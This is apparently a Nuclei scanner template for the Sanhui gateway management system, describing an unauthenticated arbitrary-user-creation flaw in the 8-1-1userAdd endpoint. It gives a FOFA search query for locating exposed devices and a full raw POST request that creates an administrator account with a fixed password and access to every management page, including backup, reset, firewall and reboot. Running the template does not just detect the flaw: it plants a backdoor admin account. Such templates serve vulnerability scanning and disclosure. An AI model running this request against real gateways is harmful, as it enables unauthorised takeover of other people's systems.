http:
    - matchers:
        - part: body
          type: word
          words:
            - already exists
            - Add user success
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /en/8-1-1userAdd.php HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
          Content-Type: application/x-www-form-urlencoded

          user_name={{username}}&user_token=&user_password=aklsd11231kkkJ!&user_authorization=1&page%5B%5D=1-1sysinfo&page%5B%5D=1-4chstatus&page%5B%5D=1-3callcount&page%5B%5D=1-6sipmsgcount&page%5B%5D=1-5guideset&page%5B%5D=2-1sipset&page%5B%5D=2-3sipcompatibility&page%5B%5D=2-4natset&page%5B%5D=2-2mediaset&page%5B%5D=3-1-1FXSset&page%5B%5D=3-8tone&page%5B%5D=3-12callsound&page%5B%5D=3-10dtmf&page%5B%5D=3-9ringnum&page%5B%5D=3-2faxpara&page%5B%5D=3-3funkey&page%5B%5D=3-4dialrules&page%5B%5D=3-5dialtimeout&page%5B%5D=3-7tip&page%5B%5D=3-11ringback&page%5B%5D=3-8qos&page%5B%5D=3-14actionurl&page%5B%5D=3-17ModuleArea&page%5B%5D=3-16vpnset&page%5B%5D=8-1user&page%5B%5D=4-1fxsset&page%5B%5D=4-1fxsadvance&page%5B%5D=4-2groupportset&page%5B%5D=5-4RouteParameter&page%5B%5D=5-1routerulesIP2Tel&page%5B%5D=5-2routerulesTel2IP&page%5B%5D=7-1manipulateSrcIP2Tel&page%5B%5D=7-2manipulateDstIP2Tel&page%5B%5D=7-3manipulateSrcTel2IP&page%5B%5D=7-4manipulateDstTel2IP&page%5B%5D=6-16manageconfig&page%5B%5D=6-21configfile&page%5B%5D=6-1netset&page%5B%5D=6-3softupdate&page%5B%5D=6-15pcap&page%5B%5D=6-17calllog&page%5B%5D=6-19operatelog&page%5B%5D=6-6backup&page%5B%5D=6-7reset&page%5B%5D=6-13systemmonitor&page%5B%5D=6-22certificates&page%5B%5D=6-23configoptimize&page%5B%5D=6-10snmp&page%5B%5D=6-10tr069&page%5B%5D=6-20iptables&page%5B%5D=6-11ping&page%5B%5D=6-22DNSTest&page%5B%5D=6-12trace&page%5B%5D=6-5modifypwd&page%5B%5D=6-8reboot&save=Save
id: sanhuiwangguan-8-1-1userAdd-User-addition
info:
    author: Superhero
    description: |-
        fofa: body="text ml10 mr20" && (title="网关管理软件" || title="Gateway Management")
        三汇网关管理系统 8-1-1userAdd 接口处存在任意用户创建漏洞，未经身份验证的远程攻击者可以利用此漏洞创建管理员账户，从而接管系统后台，造成信息泄露，导致系统处于极不安全的状态。
    name: 三汇网关管理系统 8-1-1userAdd 任意用户创建漏洞
    reference:
        - https://mp.weixin.qq.com/s/F47rfidliych-VT9Q-6TDw
    severity: high
    tags:
        - User addition
        - mmonit
variables:
    username: '{{to_lower(rand_base(6))}}'
